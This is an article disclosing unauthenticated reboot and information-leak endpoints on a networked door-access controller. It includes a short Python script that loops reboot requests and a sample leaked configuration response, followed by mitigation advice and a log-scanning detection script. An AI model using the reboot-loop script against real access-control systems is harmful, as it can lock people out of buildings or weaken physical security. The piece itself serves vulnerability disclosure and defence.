Insecure IoT Devices Controlling Physical Security.


I know, this topic has been hammered on by many people.


IoT security: you hear about it constantly, yet there are still so many insecure devices. I'm writing yet another article about another device that lacks proper security, which could allow an attacker to manipulate the device.

The IoT device I will be discussing in this article is a controller for a physical access control system. It is a PoE device that acts as the main control unit for a door: it controls the Wiegand reader and the electronic lock on the door. It communicates with a central server program that can be hosted on site or used with a cloud service.

I won't be covering the basic, obvious ways to access the device. This article assumes that the default credentials on the device have been changed. The method I am discussing will work even if you do not know the device's credentials to log in to it locally.


Attacking the Device.

This particular device allows you to reboot it without needing to enter credentials. It allows you to send a simple HTTP GET request to initiate the reboot.

I won't be showing the full URL, as it gives away the device model number.

Simply send a request to "http://<DEVICEIP>/<MODEL>/reboot" and the device reboots. With this I can create a simple Python script to put the device into a reboot loop.

import requests
import time

# Send the unauthenticated reboot request 100 times, two seconds apart.
con_reboot = 'http://<deviceip>/<model>/reboot'
for i in range(100):
    get_reboot = requests.get(con_reboot)
    print(get_reboot.json())  # response from the device
    time.sleep(2)

This simple script causes the device to reboot every 2 seconds and prints the response from the device:

"{'result': True, 'cmd': 'REBOOT'}".

Aside from being able to reboot the device, I am also able to retrieve some information from it. If I replace "/reboot" with "/getoutbound", it returns:

{"result":true, "cmd":"GETOUTBOUND", "body":{"siteKey":"", "primaryHostAddress":"", "primaryPort":18800, "secondaryHostAddress":"", "secondaryPort":18800, "primarySsl":1, "secondarySsl":1, "retryInterval":0, "maxRandomRetryInterval":600, "enabled":1, "sslCertVerification":0}}

Depending on the configuration of the device, you may get the server's IP address in the "primaryHostAddress" field. The response also shows the port the device is using to communicate with the server.


Impact

What kind of damage can this cause?

At a minimum, an attacker can disable your access control system, causing you to be locked out of the building. Depending on the configuration of the device, an attacker may also be able to cause the door to unlock and gain entry.

Continuously rebooting the device may also cause damage to the unit, costing your company money to repair or replace the device.

Being able to retrieve information from the device, such as the IP address of the server it’s communicating with and the port it’s using, gives an attacker more information to use against you.

The device responding to unauthenticated commands for this information may also mean that there are more commands that can be used to gather information or even possibly take control of the device on the network.


Conclusion

If you find that a device like this is being used on your network and there is no patch to fix it or option to replace it, you will want to take steps to limit any kind of access to it. Make sure these kinds of devices are placed in a network separate from your main network, and enable as many security measures as you can to prevent access to them.
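While such a device stays on the network, the two requests described above can also be watched for. The following is an added example, not part of the original article or the vendor's software: it scans request logs from a firewall or proxy in front of the controller network and flags "/reboot" and "/getoutbound" requests from unexpected hosts, plus repeated reboots in a short window. The log format, the management host address, the thresholds and the sample lines are all assumptions constructed for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

MGMT_HOSTS = {"192.0.2.5"}           # assumed: the only host allowed to manage controllers
WATCHED = ("reboot", "getoutbound")  # the two unauthenticated commands named in the article
LOOP_COUNT, LOOP_WINDOW = 3, timedelta(seconds=30)  # assumed reboot-loop thresholds

# Constructed sample log, one request per line: timestamp, source, controller, method, path.
SAMPLE_LOG = """\
2024-03-12T09:00:00 192.0.2.5 198.51.100.20 GET /<MODEL>/reboot
2024-03-12T09:10:00 192.0.2.77 198.51.100.20 GET /<MODEL>/getoutbound
2024-03-12T09:10:05 192.0.2.77 198.51.100.20 GET /<MODEL>/reboot
2024-03-12T09:10:07 192.0.2.77 198.51.100.20 GET /<MODEL>/reboot
2024-03-12T09:10:09 192.0.2.77 198.51.100.20 GET /<MODEL>/reboot
2024-03-12T09:10:11 192.0.2.77 198.51.100.20 GET /index.html
"""

def find_alerts(log_text):
    """Return (kind, src, dst, timestamp) tuples for suspicious controller requests."""
    alerts = []
    recent = defaultdict(deque)  # (src, dst) -> timestamps of recent reboot requests
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip malformed lines
        stamp, src, dst, method, path = parts
        # Last path segment, ignoring any query string and trailing slash.
        command = path.split("?", 1)[0].rstrip("/").rsplit("/", 1)[-1].lower()
        if method != "GET" or command not in WATCHED:
            continue
        when = datetime.fromisoformat(stamp)
        if src not in MGMT_HOSTS:
            alerts.append((f"unexpected-{command}", src, dst, stamp))
        if command == "reboot":
            window = recent[(src, dst)]
            window.append(when)
            while when - window[0] > LOOP_WINDOW:
                window.popleft()  # drop reboots that fell out of the window
            if len(window) == LOOP_COUNT:  # fires when the count reaches the threshold
                alerts.append(("reboot-loop", src, dst, stamp))
    return alerts

if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_LOG):
        print(*alert)
```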

Manufacturers of IoT devices, especially ones marketed for security, really need to step up their quality. No device should be able to be rebooted without authorization, or give up information about the network it is on.